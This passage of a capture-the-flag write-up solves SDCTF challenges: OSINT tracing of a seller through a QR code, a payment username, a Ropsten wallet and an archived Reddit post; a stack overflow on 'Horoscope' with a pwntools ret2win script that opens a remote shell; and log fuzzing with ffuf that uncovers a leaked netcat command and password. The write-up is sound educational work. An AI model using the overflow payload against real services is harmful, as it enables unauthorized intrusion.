AAAAU2NyZWVuc2hvdNuRKQwAAAI9aVRYdFhNTDpjb20uYWRvYmUueG1wAAAAAAA8eDp4bXBtZXRh
IHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJYTVAgQ29yZSA2LjAuMCI+CiAgIDxy
ZGY6UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4
<--SNIP-->
DtgBO+CN0eeAHbADdmDDAW+MG4b4rR2wA3bAG6PPATtgB+zAhgPeGDcM8Vs7YAfsgDdGnwN2wA7Y
gQ0HvDFuGOK3dsAO2AFvjD4H7IAdsAMbDnhj3DDEb+2AHbAD3hh9DtgBO2AHNhzwxrhhiN/aATtg
B7wx+hywA3bADmw44I1xwxC/tQN2wA54Y/Q5YAfsgB3YcMAb44YhfmsH7IAd8Mboc8AO2AE7sOGA
N8YNQ/zWDtgBO/D/ATm6EF9LClK2AAAAAElFTkSuQmCC
--BOUND_62634AA53D6521.02935547--
After decoding base 64 we get a qr code png.
Reading this with any qr code reader app gives a link to the cash app page of the seller.
https://cash.app/$limosheen?qr=1
Nothing much in the url itself, but now we have a username “limosheen” which we can hunt for.
Staying in the money app spectrum, we could find a paypal user with that name here:
https://paypal.me/limosheen
New clues to work with! We can see a wallet address and that it’s for ropETH. I don’t think it’s a common way to call it, but we’re talking about the Ropsten Ethereum blockhain here, which is also known as the “Ethereum Testnet”. It’s basically used for development and testing purposes before deploying to the mainnet.
So now that we have the wallet and the blockchain, we can try and follow the money 💸
https://ropsten.etherscan.io/address/0xbad914d292cbfee9d93a6a7a16400cb53319a43b
We can see a small amount of transactions happening 15 days ago, and only one outgoing transaction to another wallet. Following the money, we can consider this wallet as interesting:
Receiving wallet (with a hefty amount of ETH and no outgoing transactions):
0x949213139D202115c8b878E8Af1F1D8949459f3f
I got lucky on this one. I always considered Google to be the superior search engine, period, but for the first time, it was not showing anything. DuckDuckGo won this fight.
This url was not available anymore, but when looking back in time we can find the flag, still base 64 encoded.
https://www.reddit.com/user/wrestling-wave/comments/u9tgk7/how_i_made_10000000_selling_fake_flags_ama/
https://web.archive.org/web/*/https://www.reddit.com/user/wrestling-wave/comments/u9tgk7/how_i_made_10000000_selling_fake_flags_ama/
Only one capture to look into:
sdctf{You_Ever_Dance_With_the_Devil_In_the_Pale_Moonlight}
pwn
Horoscope
Solved by: Taz34
Here we have a binary so the first thing i started to look for is to get a segmentation fault and we got it.
Now I started looking for offset so the offset multiple to be added is 42 i.e.
python3 -c "print('10/10/1999/10:' + '1'*42)"
Hence the payload is: 10/10/1999/10:111111111111111111111111111111111111111111
Now we started looking at Ghidra, and we found a function “test” from which we can get a shell on target.
here we have a problem that we need to make this (temp == 1) conditon true. So, after going to other functions we found another function “debug”
Now we can construct the final payload as:
payload = b"01/01/2001/01:111111111111111111111111111111111111111111" + debug_fun_addr + test_fun_addr
hence the final script:
from pwn import *
p = remote("horoscope.sdc.tf", 1337)
payload = b"01/01/2001/01:111111111111111111111111111111111111111111" + p64(0x40096e) +p64(0x400950)
p.sendline(payload)
p.interactive()
now just execute this script to get the flag
Flag: sdctf{S33ms_y0ur_h0rO5c0p3_W4s_g00d_1oD4y}
web
Lots of logs
Solved By : thewhiteh4t
The blog contains links to 3 log files. As per hints in challenge description we are supposed to find more log files and as an assumption one of them will contain the flag
On the basis of the URL of the 3 available log files I created a small custom wordlist :
> cat wordlist.txt
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
2010
2011
2012
2013
2014
2015
2016
2017
2018
2019
2020
2021
2022
Mon.log
Tue.log
Wed.log
Thu.log
Thur.log
Fri.log
Sat.log
Sun.log
then I used ffuf to fuzz the challenge site to find more logs…
ffuf -w wordlist.txt -u https://logs.sdc.tf/logs/FUZZ -recursion -recursion-depth 5 -o results.txt -of csv
in the result I gathered over 1900 logs!
After this I attempted to curl them and find sdctf in them but it did not work so flag wasn’t available directly. Then I downloaded all available logs 😞 using wget
After wasting some hours :
grep -vrnw "SELL\|FIN\|PROC\|LOG\|PROF" .
so -v is used for invert grep, I used it because I was looking for unusual stuff, if you look at the log most of them have these keywords like SELL etc which were normal text
so here we can see that some of the bash history is leaked
nc logger.sdc.tf 1338
and a password
82d192aa35a6298997e9456cb3a0b5dd92e4d6411c56af2169bed167b53f38d
